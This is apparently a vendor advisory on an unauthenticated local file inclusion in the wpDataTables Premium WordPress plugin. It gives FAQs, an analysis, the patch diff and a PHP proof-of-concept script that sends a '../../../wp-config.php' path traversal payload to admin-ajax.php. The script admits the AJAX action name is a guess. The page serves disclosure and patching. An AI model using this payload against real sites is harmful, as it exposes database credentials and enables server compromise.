What is CVE-2026-28039?

CVE-2026-28039 is a high-severity vulnerability in the wpDataTables (Premium) plugin for WordPress, affecting versions up to 6.5.0.1. It allows unauthenticated attackers to exploit Local File Inclusion (LFI), potentially leading to the execution of arbitrary PHP code on the server.

How does the vulnerability work?

The vulnerability arises from insufficient validation of user-controlled parameters in the `setInterfaceLanguage` method. Attackers can manipulate the `$lang` parameter to include files from the server’s filesystem, such as configuration files, by using path traversal techniques.

Who is affected by this vulnerability?

Any WordPress site using the wpDataTables (Premium) plugin version 6.5.0.1 or earlier is at risk. Administrators should verify their plugin version to determine if they are affected.

How can I check if my site is vulnerable?

To check for vulnerability, verify the version of the wpDataTables plugin installed on your WordPress site. If it is 6.5.0.1 or earlier, your site is vulnerable to CVE-2026-28039.

How can I fix or mitigate this issue?

The vulnerability has been patched in version 6.5.0.2 of the wpDataTables plugin. Administrators should update their plugin to this version or later to mitigate the risk.

What does a CVSS score of 8.1 indicate?

A CVSS score of 8.1 is classified as high severity, indicating that the vulnerability poses a significant risk to the affected systems. It suggests that exploitation could lead to serious consequences, such as unauthorized access or data breaches.

What practical risks does this vulnerability pose?

If exploited, this vulnerability could allow attackers to execute arbitrary PHP code, leading to complete server compromise. This may result in data loss, unauthorized access to sensitive information, or the installation of malicious software.

What is a proof of concept (PoC) in this context?

The proof of concept provided demonstrates how an attacker can exploit CVE-2026-28039 by sending a crafted request to the wpDataTables plugin. It shows how an attacker can manipulate the `interfaceLanguage` parameter to include sensitive files from the server.

What are the implications of remote code execution?

Remote code execution allows an attacker to run arbitrary code on the server, which can lead to full control over the server environment. This can enable data theft, website defacement, or the use of the server for further attacks.

How can I protect my WordPress site from similar vulnerabilities?

To protect against vulnerabilities, regularly update all plugins and themes, use security plugins, and implement web application firewalls. Additionally, conduct regular security audits and monitor for unusual activity.

What additional steps should I take after patching?

After updating to the patched version, review your site’s security settings, check for any unauthorized changes, and consider conducting a security scan to ensure no other vulnerabilities exist.

Where can I find more information about this vulnerability?

More information about CVE-2026-28039 can be found on the National Vulnerability Database (NVD) or through security advisories from the plugin developer. Staying informed about security updates is crucial for maintaining site safety.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : March 18, 2026

CVE-2026-28039: wpDataTables (Premium) <= 6.5.0.1 – Unauthenticated Local File Inclusion (wpdatatables)

CVE ID CVE-2026-28039

Plugin wpdatatables

Severity High (CVSS 8.1)

CWE 98

Vulnerable Version 6.5.0.1

Patched Version 6.5.0.2

Disclosed March 2, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-28039:
The vulnerability is an unauthenticated Local File Inclusion (LFI) in the wpDataTables Premium plugin for WordPress. The root cause is insufficient validation of user-controlled parameters used to construct file paths for inclusion via PHP’s `require_once`. The primary attack vector targets the `setInterfaceLanguage` method in `class.wpdatatable.php`. This method accepts a `$lang` parameter, which is directly concatenated into a file path at line 528 (`$this->_interfaceLanguage = WDT_ROOT_PATH . ‘source/lang/’ . $lang;`) without proper sanitization. An attacker can supply a path traversal sequence (e.g., `../../../wp-config.php`) in the `lang` parameter to include arbitrary PHP files from the server’s filesystem. The vulnerability is triggered via the plugin’s AJAX or REST API handlers that accept table configuration data containing the `interfaceLanguage` setting. The patch introduces multiple layered defenses. In `class.wdtsettingscontroller.php`, the `wdtInterfaceLanguage` setting is sanitized using `basename()` and validated to ensure it ends with `.inc.php` and exists in the intended directory. In `class.wpdatatable.php`, the `setInterfaceLanguage` method now uses `basename()`, validates the file extension, and employs `realpath()` checks to prevent directory traversal. The patch also adds input validation for the `engine` parameter in `class.wpdatachart.php` and the column type in `class.wpdatacolumn.php` to prevent LFI via other code paths. If exploited, this vulnerability allows remote code execution by including a malicious PHP file, such as a web shell uploaded as an image, leading to complete server compromise.

Differential between vulnerable and patched code

Code Diff

--- a/wpdatatables/config/config.inc.php
+++ b/wpdatatables/config/config.inc.php
@@ -9,7 +9,7 @@

 // Current version

-define('WDT_CURRENT_VERSION', '6.5.0.1');
+define('WDT_CURRENT_VERSION', '6.5.0.2');

 // Version when hooks are updated
 define('WDT_INITIAL_LITE_VERSION', '3.4.2.16');
--- a/wpdatatables/source/class.wdtsettingscontroller.php
+++ b/wpdatatables/source/class.wdtsettingscontroller.php
@@ -22,6 +22,23 @@
                 } else {
                     $setting = sanitize_textarea_field($setting);
                 }
+            } elseif ($key === 'wdtInterfaceLanguage') {
+                // Security Fix: Prevent Path Traversal / LFI for language file (CVE-2026-28039)
+                if (!empty($setting)) {
+                    // Only allow basename (no directory traversal)
+                    $setting = basename(sanitize_text_field($setting));
+
+                    // Verify it's a valid language file
+                    if (substr($setting, -8) !== '.inc.php') {
+                        $setting = ''; // Invalid format, reject it
+                    } else {
+                        // Double-check the file exists in the lang directory
+                        $langPath = WDT_ROOT_PATH . 'source/lang/' . $setting;
+                        if (!file_exists($langPath) || !is_file($langPath)) {
+                            $setting = ''; // File doesn't exist, reject it
+                        }
+                    }
+                }
             } else{
 				$setting = sanitize_text_field( $setting );
 			}
--- a/wpdatatables/source/class.wpdatachart.php
+++ b/wpdatatables/source/class.wpdatachart.php
@@ -465,8 +465,18 @@
      */
     public static function build($constructedChartData, $loadFromDB = false)
     {
-        $wdtChart = 'Wdt' . ucfirst($constructedChartData['engine']) . 'Chart' . 'Wdt' . ucfirst($constructedChartData['engine']) . 'Chart';
-        $chartClassFileName = 'class.' . $constructedChartData['engine'] . '.wpdatachart.php';
+        // Security Fix: Whitelist valid chart engines to prevent LFI
+        $validEngines = array('google', 'chartjs', 'highcharts', 'apexcharts');
+
+        $engine = isset($constructedChartData['engine']) ? strtolower(sanitize_text_field($constructedChartData['engine'])) : 'google';
+
+        if (!in_array($engine, $validEngines, true)) {
+            // Invalid engine, default to google
+            $engine = 'google';
+        }
+
+        $wdtChart = 'Wdt' . ucfirst($engine) . 'Chart' . 'Wdt' . ucfirst($engine) . 'Chart';
+        $chartClassFileName = 'class.' . $engine . '.wpdatachart.php';
         require_once(WDT_ROOT_PATH . 'source/' . $chartClassFileName);
         return new $wdtChart($constructedChartData, $loadFromDB);
     }
--- a/wpdatatables/source/class.wpdatacolumn.php
+++ b/wpdatatables/source/class.wpdatacolumn.php
@@ -670,8 +670,23 @@
         if (!$wdtColumnType) {
             $wdtColumnType = 'string';
         }
+
+        // Security Fix: Whitelist valid column types to prevent LFI
+        $validColumnTypes = array(
+            'string', 'int', 'float', 'date', 'datetime', 'time', 'link', 'email',
+            'image', 'file', 'formula', 'masterdetail', 'attachment'
+        );
+
+        // Normalize and validate column type
+        $wdtColumnType = strtolower(sanitize_text_field($wdtColumnType));
+
+        if (!in_array($wdtColumnType, $validColumnTypes, true)) {
+            // Invalid column type, default to string
+            $wdtColumnType = 'string';
+        }
+
         $columnObj = ucfirst($wdtColumnType) . 'WDTColumn';
-        $columnFormatterFileName = 'class.' . strtolower($wdtColumnType) . '.wpdatacolumn.php';
+        $columnFormatterFileName = 'class.' . $wdtColumnType . '.wpdatacolumn.php';
         require_once($columnFormatterFileName);
         return new $columnObj($properties);
     }
--- a/wpdatatables/source/class.wpdatatable.php
+++ b/wpdatatables/source/class.wpdatatable.php
@@ -525,15 +525,40 @@
         return $this->_verticalScroll;
     }

+    /**
+     * @throws WDTException
+     */
     public function setInterfaceLanguage($lang)
     {
         if (empty($lang)) {
             throw new WDTException('Incorrect language parameter!');
         }
-        if (!file_exists(WDT_ROOT_PATH . 'source/lang/' . $lang)) {
+
+        // Security Fix: Prevent Path Traversal / LFI attacks (CVE-2026-28039)
+        // Remove any path traversal attempts and allow only valid filenames
+        $lang = basename($lang);
+
+        // Additional security: Only allow .inc.php extension
+        if (substr($lang, -8) !== '.inc.php') {
+            throw new WDTException('Invalid language file format!');
+        }
+
+        // Build the safe path
+        $safePath = WDT_ROOT_PATH . 'source/lang/' . $lang;
+
+        // Verify the resolved path is still within the lang directory
+        $realPath = realpath($safePath);
+        $realLangDir = realpath(WDT_ROOT_PATH . 'source/lang/');
+
+        if ($realPath === false || strpos($realPath, $realLangDir) !== 0) {
+            throw new WDTException('Language file not found or path traversal detected!');
+        }
+
+        if (!file_exists($safePath)) {
             throw new WDTException('Language file not found');
         }
-        $this->_interfaceLanguage = WDT_ROOT_PATH . 'source/lang/' . $lang;
+
+        $this->_interfaceLanguage = $safePath;
     }

     public function getInterfaceLanguage()
--- a/wpdatatables/source/class.wpdatatablecache.php
+++ b/wpdatatables/source/class.wpdatatablecache.php
@@ -327,6 +327,17 @@
 					$format = substr(strrchr($source, "."), 1);
 					$objReader = WPDataTable::createObjectReader($source);
                 if (isset($tableData) && $tableData->file_location == 'wp_any_url'){
+                    // Security Fix: Validate URL before file_get_contents to prevent SSRF/LFI
+                    if (!filter_var($source, FILTER_VALIDATE_URL)) {
+                        throw new Exception('Invalid URL format!');
+                    }
+
+                    // Prevent access to local files via file:// protocol
+                    $parsedUrl = parse_url($source);
+                    if (!isset($parsedUrl['scheme']) || !in_array(strtolower($parsedUrl['scheme']), array('http', 'https'), true)) {
+                        throw new Exception('Only HTTP and HTTPS protocols are allowed!');
+                    }
+
                     $file = @file_get_contents($source);
                     if ($file === false){
                         throw new Exception('There is an error opening the file!');
--- a/wpdatatables/templates/admin/dashboard/dashboard.inc.php
+++ b/wpdatatables/templates/admin/dashboard/dashboard.inc.php
@@ -343,7 +343,7 @@
                         <div class="alert alert-info m-b-0" role="alert">
                             <i class="wpdt-icon-info-circle-full"></i>
                             <ul>
-                                <li>Added a new page for managing user permissions with wpDataTables capabilities for viewing tables and charts.</li>
+                                <li>Fixed vulnerability issue with Local File Inclusion (LFI).</li>
                                 <li>Other small bug fixes and stability improvements.</li>
                             </ul>
                         </div>
--- a/wpdatatables/wpdatatables.php
+++ b/wpdatatables/wpdatatables.php
@@ -3,7 +3,7 @@
 Plugin Name: wpDataTables - Tables & Table Charts
 Plugin URI: https://wpdatatables.com
 Description: Create responsive, sortable tables & charts from Excel, CSV or PHP. Add tables & charts to any post in minutes with DataTables.
-Version: 6.5.0.1
+Version: 6.5.0.2
 Author: TMS-Plugins
 Author URI: https://tmsproducts.io
 Text Domain: wpdatatables

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-28039 - wpDataTables (Premium) <= 6.5.0.1 - Unauthenticated Local File Inclusion
<?php
$target_url = 'http://target-site.com/wp-admin/admin-ajax.php';

// The action parameter likely corresponds to a wpDataTables AJAX hook.
// Common actions include 'wpdatatables_save_table_config' or 'wpdatatable_save'.
// This PoC uses a generic action; the exact hook name may vary.
$action = 'wpdatatables_save_table_config';

// Craft a payload that sets the interfaceLanguage to a path traversal.
// This attempts to include the WordPress configuration file.
$payload = array(
    'action' => $action,
    'tableData' => json_encode(array(
        'interfaceLanguage' => '../../../wp-config.php'
    ))
);

$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $target_url);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $payload);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);

$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

echo "HTTP Response Code: $http_coden";
echo "Response Body:n$responsen";

// A successful exploitation may return the contents of wp-config.php,
// or cause a PHP error if the included file contains code that breaks execution.
?>

Frequently Asked Questions

What is CVE-2026-28039?
Understanding the vulnerability
CVE-2026-28039 is a high-severity vulnerability in the wpDataTables (Premium) plugin for WordPress, affecting versions up to 6.5.0.1. It allows unauthenticated attackers to exploit Local File Inclusion (LFI), potentially leading to the execution of arbitrary PHP code on the server.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability arises from insufficient validation of user-controlled parameters in the `setInterfaceLanguage` method. Attackers can manipulate the `$lang` parameter to include files from the server’s filesystem, such as configuration files, by using path traversal techniques.
Who is affected by this vulnerability?
Identifying impacted users
Any WordPress site using the wpDataTables (Premium) plugin version 6.5.0.1 or earlier is at risk. Administrators should verify their plugin version to determine if they are affected.
How can I check if my site is vulnerable?
Version verification steps
To check for vulnerability, verify the version of the wpDataTables plugin installed on your WordPress site. If it is 6.5.0.1 or earlier, your site is vulnerable to CVE-2026-28039.
How can I fix or mitigate this issue?
Applying the patch
The vulnerability has been patched in version 6.5.0.2 of the wpDataTables plugin. Administrators should update their plugin to this version or later to mitigate the risk.
What does a CVSS score of 8.1 indicate?
Understanding severity ratings
A CVSS score of 8.1 is classified as high severity, indicating that the vulnerability poses a significant risk to the affected systems. It suggests that exploitation could lead to serious consequences, such as unauthorized access or data breaches.
What practical risks does this vulnerability pose?
Potential impact on systems
If exploited, this vulnerability could allow attackers to execute arbitrary PHP code, leading to complete server compromise. This may result in data loss, unauthorized access to sensitive information, or the installation of malicious software.
What is a proof of concept (PoC) in this context?
Demonstrating the vulnerability
The proof of concept provided demonstrates how an attacker can exploit CVE-2026-28039 by sending a crafted request to the wpDataTables plugin. It shows how an attacker can manipulate the `interfaceLanguage` parameter to include sensitive files from the server.
What are the implications of remote code execution?
Understanding the consequences
Remote code execution allows an attacker to run arbitrary code on the server, which can lead to full control over the server environment. This can enable data theft, website defacement, or the use of the server for further attacks.
How can I protect my WordPress site from similar vulnerabilities?
Best practices for security
To protect against vulnerabilities, regularly update all plugins and themes, use security plugins, and implement web application firewalls. Additionally, conduct regular security audits and monitor for unusual activity.
What additional steps should I take after patching?
Post-update security measures
After updating to the patched version, review your site’s security settings, check for any unauthorized changes, and consider conducting a security scan to ensure no other vulnerabilities exist.
Where can I find more information about this vulnerability?
Resources for further reading
More information about CVE-2026-28039 can be found on the National Vulnerability Database (NVD) or through security advisories from the plugin developer. Staying informed about security updates is crucial for maintaining site safety.

How Atomic Edge Works

Simple Setup. Powerful Security.

Atomic Edge acts as a security layer between your website & the internet. Our AI inspection and analysis engine auto blocks threats before traditional firewall services can inspect, research and build archaic regex filters.

Get Started

Trusted by Developers & Organizations